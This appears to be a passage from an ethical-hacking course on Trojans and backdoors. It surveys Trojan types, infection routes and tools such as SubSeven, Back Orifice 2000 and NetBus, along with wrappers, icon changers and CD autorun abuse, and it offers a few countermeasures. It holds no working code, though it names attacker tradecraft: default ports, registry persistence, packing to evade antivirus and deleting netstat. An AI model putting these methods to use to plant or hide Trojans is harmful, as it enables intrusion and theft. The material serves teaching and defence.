These Trojans are directed towards extracting all the cached passwords and also capture other passwords entered by the victim and email them across to an attacker specified mail address, without the victim realizing it. The password harvest may include passwords for ICQ, IRC, FTP, HTTP or any other application that require a user to enter a login and password. Most of them do not restart when Windows is loaded, as the objective is to gather as much info about the victim's machine as passwords, mIRC logs, ICQ conversations and mail them to the attacker.
■ Keyloggers
These Trojans log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. They usually come with two functions such as online and offline recording. As with the previous group, these Trojans can be configured to send the log file to a specific e-mail address on a regular basis.
■ Destructive
The only function of these Trojans is to destroy and delete files. They can deliberately delete core system files (for example: .dll, .ini or .exe files, possibly others) on the target machine. The Trojan is activated by the attacker or sometimes works like a logic bomb and starts on a specific day and at specific hour.
■ Denial of Service (DoS) Attack Trojans
These Trojans used by attackers to issue a denial of service. A distributed denial of service may also be issued if the attacker has gathered enough victims. WinTrinoo is a DDoS tool that has become popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result.
Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered.
■ Proxy/Wingate Trojans
Underground sites are known to announce freely available proxy servers. These Trojans turn the victim's computer into a proxy/Wingate server available to the whole world or to the attacker only. It is used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for other illegal activities. This gives the attacker complete anonymity and the chance to do everything and point the trail to the victim.
■ FTP Trojans
These Trojans open port 21(the port for FTP transfers) and lets anybody or just the attacker connect to the machine. They may be password protected so only the attacker is able connect to the computer.
■ Software Detection Killers
There are such functionalities built into some Trojans, but there are also separate programs that will kill Zone Alarm, Norton Anti-Virus and many other (popular anti-virus/firewall) programs, that protect the target machine. When they are disabled, the attacker has full access to the machine to perform some illegal activity or use the computer to attack others and often disappear.
Trojans and Backdoors - :Modes of Transmission
Ø ICQ
Ø IRC
Ø Attachments
Ø Physical Access
Ø Browser And E-mail Software Bugs
Ø NetBIOS (File Sharing)
Ø Fake Programs
Ø Un-trusted Sites And Freeware Software
Ø ICQ
People can also get infected while chatting / talking / video messaging over ICQ or any other Instant Messenger Application. It is a risk that the user undertakes when it comes to receiving files no matter from whom or where it comes.
Ø IRC
Here also, the threat comes from exchange of files no matter what they claim to be or where they come from. It is possible that some of these are infected files or disguised files.
Ø Attachments
Any attachment, even if it is from a known source should be screened as it is possible that the source was infected earlier and is not aware of it.
Ø Physical Access
Physical access to a target machine is perhaps the easiest way for an attacker to infect a machine. The motive may be a prank or just plain curiosity.
Ø Browser and E-mail Software Bugs
Having outdated applications can expose the system to malicious programs such as Trojans without any other action on behalf of the attacker.
Ø NetBIOS (File Sharing)
If port 139 is opened, the attacker can install trojan .exe and modify some system file, so that it will run the next time the system is rebooted. To block file sharing in Windows version, go to: Start->Settings->Control Panel->Network->File and Print Sharing and uncheck the boxes there.
Tools and Softwares for Trojans and Backdoors
Tool: QAZ
Ø It is a companion virus that can spread over the network.
Ø It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.
Ø It may have originally been sent out by email.
Ø Rename notepad to note.com
Ø Modifies the registry key:
HKLM\software\Microsoft\Windows\Current Version\Run
Hacking Tool:Tini
It is a very tiny trojan program which is only 3 kb and programmed in assembly language. It takes minimal bandwidth to get on victim's computer and takes small disk space.
Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easier for a victim system to detect by scanning for port 7777.
From a tini client you can telnet to tini server at port 7777
Tool: Netcat
Ø Outbound or inbound connections, TCP or UDP, to or from any ports
Ø Ability to use any local source port
Ø Ability to use any locally-configured network source address
Ø Built-in port-scanning capabilities, with randomizer
Ø Built-in loose source-routing capability
Tool: Donald Dick
The attacker uses the client to send command through TCP or SPX to the victim listening on a pre defined port.
Donald Dick uses default port either 23476 or 23477
Donald Dick is a tool that enables a user to control another computer over a network.
It uses a client server architecture with the server residing on the victim's computer.
Tool: SubSeven
o SubSeven is a backdoor program that enables others to gain full access to Windows 9x systems through network connection.
Ø The program consists of three different components : Client (SubSeven.exe), Server (Server.exe) and a Server configuration utility (EditServer.exe).
o The client is a GUI used to connect to server through a network or internet connection.
Since its debut in February, 1999, SubSeven has become a favorite tool of intruders targeting Windows machines. |
It is a RAT (Remote Administration Tool) that provides more options for attack than other Trojans like Back Orifice or NetBus. The SubSeven Trojan is consists of three programs: the SubSeven server, client and server editor. It has a DDoS potential and like other Trojans, SubSeven can be used as perfectly benign remote administration program.
The server must be run on the target computer to allow the attacker's computer to connect to the machine and have total access to it. The server editor (EditServer Program) helps configure the infection characteristics. This allows the hacker to specify whether the compromised system should send an email or ICQ notification to the attacker when the target is online, whether the program should "melt server after installation" and which ports the attacker can use to connect to the server. Once installed, SubSeven's friendly user-interface allows the attacker to easily monitor a victim's keystrokes, watch a computer's web cam, take screen shots, eavesdrop through the computer's microphone, control the mouse pointer, read and write files, and sniff traffic off the victim's local network.
Tool: Back Oriffice 2000
Back Orifice accounts for highest number of infestations on Microsoft computers.
The BO2K server code is only 100KB. The client program is 500KB.
Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.
BO2K has stealth capabilities, it will not show up on the task list and runs completely in hidden mode.
BO2K was written by DilDog of the Cult of the Dead Cow. Many of the commands that B02K comes with were directly ported from Sir Dystic's original Back Orifice source code. The document says that it was written with a two-fold purpose: "To enhance the Windows operating system's remote administration capability and to point out that Windows was not designed with security in mind." |
B02K is an almost complete rewrite of the original Back Orifice. By default, B02K comes with the capability to talk over TCP as well as UDP, and supports strong encryption through plug-ins. It has added functionality in the areas of file transfer and registry handling. It has hacking features, such as dumping certain cached passwords. It can be configured to be stealthy.
Like other Trojans, Back Orifice is a client/server application which allows the client software to monitor, administer, and perform other network and multimedia actions on the machine running the server. To communicate with the server, either the text based or GUI client can be run on any Microsoft Windows machine.
The B02K server installed without any plugins is ~100K and leaves a small footprint. The client software is ~500K. The whole suite will fit on a single 1.44MB floppy disk. B02K 1.0 will currently run on Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, and Windows XP systems. All of the various parts of the BO2K suite have been tested and found to be working on all of these platforms. It only runs on Intel platforms at the moment.
Back Oriffice Plug-ins
Ø BO2K functionality can be extended using BO plug-ins.
Ø BOPeep (Complete remote control snap in)
Ø Encryption (Encrypts the data sent between the BO2K GUI and the server)
Ø BOSOCK32 (Provides stealth capabilities by using ICMP instead of TCP UDP)
Ø STCPIO (Provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)
BO Peep - This plugin gives you a streaming video of the machine's screen that the server is running on. Also provides remote keyboard and mouse accessibility. |
Serpent Encryption - This is a very fast implementation of the non-export-restricted 256 bit-SERPENT encryption algorithm. |
CAST-256 Encryption - This internationally available plugin provides strong encryption using the CAST-256 algorithm. |
IDEA Encrypt - This internationally available plugin provides strong encryption using the IDEA algorithm. 128 Bit Encryption. |
RC6 Encryption - This internationally available plugin provides strong encryption using the RC6 algorithm. Provides 384 bit encryption. |
STCPIO - TCPIO communications plugin with an encrypted flow control system to make BO2K TCP traffic virtually impossible to detect. |
Rattler notifies a specified user as to the whereabouts of a Back Orifice 2000 server via e-mail. Rattler will send an e-mail each time it detects an IP address addition/modification. |
rICQ is a plugin for Back Orifice 2000 that operates in a similar fashion to Rattler except that the notification message is sent via ICQ's web pager service. |
The Butt Trumpet 2000 plugin for BO2K, once installed and started, sends you an email with the host's IP address. A nice alternative to Rattler. |
BoTool provides a graphical file browser and registry editor to the BO2K interface. Makes common tedious BO2K tasks point-and-click simple. |
Tool: NetBus
NetBus was written by a Swedish programmer, Carl-Fredrik Neikter, in March 1998. Version 1.5 in English appeared in April. NetBus apparently received little media attention but it was in fairly wide use by the time BO was released on 3 August. |
NetBus consists of two parts: a client-program ("netbus.exe") and a server-program often named: "patch.exe" (or "SysEdit.exe" with version 1.5x), which is the actual backdoor. Version 1.60 uses the TCP/UDP-Port # "12345" which can't be altered. From the version 1.70 and higher the port be configured. If it is installed by a "game" called "whackamole" (file name is: "whackjob.zip" (contains the NetBus 1.53 server) its name is "explore.exe". There is also a file called whackjob17.zip, which installs the server of NetBus 1.70 and uses the port 12631. Additionally it is password protected (PW: "ecoli"). The NetBus Server is installed by "game.exe" during the setup routine; the name of the server actually is "explore.exe" located in the windows directory.
To start the server automatically, there is an entry in the registry at: "\HKEY_LOCAL_MACHINESOFTWARE\Microsoft\Windows\CurrentVersion\Run" normally used with the option "/nomsg". If this entry is deleted, the server won't be started with windows.
The NetBus server is about 4 times as large as the Back Orifice server, and generally less "stealthy." Unlike BO, NetBus is not designed to attach virus-like to legitimate files or applications.
Like BO, the NetBus server can have practically any filename. The usual way it is installed is through simple deception; the program is sent to the victim, or offered on a website, and falsely represented as something it is not. Occasionally it may be included in a setup package for a legitimate application and executed in the process of that setup.
The unsuspecting victim runs the program either directly or by way of the application used as camouflage, and it immediately installs itself and begins to offer access to intruders.
NetBus will always reveal its presence by way of an open port, viewable with netstat.exe. Because of this, many intruders delete netstat.exe from the victim's hard drive immediately upon gaining access. Creating a copy or two of netstat using other names is a good precaution against its loss. A regular check for the presence of netstat.exe, including the file's size and date, is advisable and is one means of spotting intrusions. Attackers may use BO as a means of installing Netbus on the target system. This is because NetBus is sophisticated yet easy to use.
Once access is gained, the intruder will often install other backdoors, ftp or http daemons which open victim's drive(s) to access or he may enable resource sharing on the Net connection
The v1.53 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
NetBus v1.53 is not extremely stealthy, but it is certainly functional and effective.
This utility also has the ability to scan "Class C" addresses by adding "+Number of ports" to the end of the target address. Example: 255.255.255.1+254 will scan 255.255.255.1 through 255.
By default, the v1.6o server is named Patch.exe. It may be renamed. Its size is 4 61K (472,576 bytes). When this program is run, it remains where it is and nothing appears to happen. Unlike v1.53, it can then be deleted uneventfully. However, it is functional. It copies itself to the Windows directory, extracts from within itself a file called KeyHook.dll and activates both programs.
Run without added parameters, v1.6o is persistent; that is, it will execute on its own when the computer is restarted. It makes changes to the Registry; it creates the keys
HKEY_CURRENT_USER\PATCH, where PATCH is the filename before the extension; and by default, it places a value in the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Version 1.60, like v1.53, also creates the Registry keys
HKEY_CURRENT_USER\NETBUS; and HKEY_CURRENT_USER\NETBUS\Settings and places basically the same series of values in the Settings key.
The v1.60 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
Among the new features are greatly expanded file-handling capabilities, an interactive message dialog, password setting and other server controls, and new ways to tamper with the keyboard. Most of its tricks are evident from this console display.
Netbus 1.7 was released to the public on 11/14/98. It is basically the same program as version 1.6, but with an ultra-fast port scanner, capable of redirecting data to another host and port, option to configure the server-exe with some options, like TCP-port and mail notification, ability redirect I/O from console applications to a specified TCP-port and restricting access to only a few IP-numbers.
By default, the v1.70 server is named Patch.exe. It may be renamed. Its default size is 483K (494,592 bytes). With configuration added, its size increases, usually by a couple of hundred bytes. By default, the v1.70 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number. It can however be readily configured to use any other virtual port from 1 to 65534. The port configuration can be pre-set by the sender, and/or it can be changed from remote. It will also open the next-numbered port in sequence, which it apparently uses for responses to the client.
NetBus 2.0 Pro", (often just called "NetBus 2.0") the latest version of this well known backdoor program has been released after Spector took over Netbus. Therefore the new version is a shareware and needs remote user's permission for installation. However, hackers have released variations such as Retail_10.exe which fakes the incomplete patch of ICQ. Instead it installs the "NetBus 2.0 Server" in the invisible and auto starting mode. It even deletes the data logged by the server.
Trojans and Backdoors - :Wrappers
Ø How does an attacker get BO2K or any trojan installed on the victim's computer? Answer: Using Wrappers
Ø A wrapper attaches a given EXE application (such as games or orifice application) to the BO2K executable.
Ø The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs BO2K and then runs the wrapped application.
Ø The user only sees the latter application.
Wrappers are used to bind the Trojan executable with a legitimate file. The attacker can compress any (DOS/WIN) binary with tools like "petite.exe". This tool decompresses an exe-file (once compressed) on runtime. This makes it possible for the Trojan to get in virtually undetected, as most antivirus are not able to detect the signatures in the file. |
The attacker can place several executables to one executable as well. These wrappers may also support functions like running one file in the background while another one is running on the desktop.
Technically speaking though, wrappers can be considered to be another type of software "glueware" that is used to attach together other software components. A wrapper encapsulates a single data source to make it usable in a more convenient fashion than the original unwrapped source.
Users can be tricked into installing Trojan horses by being enticed or frightened. For example, a Trojan horse might arrive in email described as a computer game. When the user receives the mail, they may be enticed by the description of the game to install it. Although it may in fact be a game, it may also be taking other action that is not readily apparent to the user, such as deleting files or mailing sensitive information to the attacker.
Graffiti.exe is an example of a legitimate file that can be used to drop the Trojan into the target system. This program runs as soon as windows boots up and on execution keep the user distracted for a given period of time by running on the desktop.
Tool: EliteWrap
Ø Elite Wrap is an advanced EXE wrapper for Windows 95/98/2K/NT used for SFX archiving and secretly installing and running programs.
Ø With EliteWrap one can create a setup program that would extract files to a directory and execute programs or batch files to display help, copy files, etc.
Icon Plus is a conversion program for translating icons between various formats. Icon Plus now can read and save Windows XP icons. Icon Plus can also be worked at from the command prompt. This kind of application can be used by an attacker to disguise his malicious code or Trojan so that users are tricked into executing it.
There are numerous icon libraries available on the Internet that allows a user to change icons to suit various operating systems by aping their look and feel.
Tool: Restorator
It is a versatile skin editor for any Win32 programs: change images, icons, text, sounds, videos, dialogs, menus, and other parts of the user interface. Using this one can create one's own User-styled Custom Applications (UCA). |
The relevance of discussing this tool here arises from its ability to modify the user interface of any Windows 32-bit program and thus create UCA's. The user can view, extract, and change images, icons, text, dialogs, sounds, videos, menus and much more.
Infecting via CD-ROM
Ø When you place a CD in your CD-ROM drive, it automatically starts with some set up interface. An Autorun.inf file that is placed on such CD's is responsible for this action which would look like this:
[autorun] open=setup.exe icon=setup.exe
Ø Therefore it is quite possible that while running the real setup program a trojan could be run very easily.
Ø Turn off the Auto-Start functionality by doing the following:
Start button-> Settings-> Control Panel-> System-> Device Manager-> CDROM-> Properties -> Settings
The Autorun.inf file that is placed on such CD's can be configured to execute the Trojan. This makes it possible to infect a machine while running the real setup program. It looks like this:
[autorun] Open= setup.exe Icon= setup.exe
Countermeasure is to stop auto start functionality by doing the following:
Start Button-> Settings-> Control Panel-> System-> Device Manager-> CDROM->Properties- > Settings
Turn off the reference to Auto Insert Notification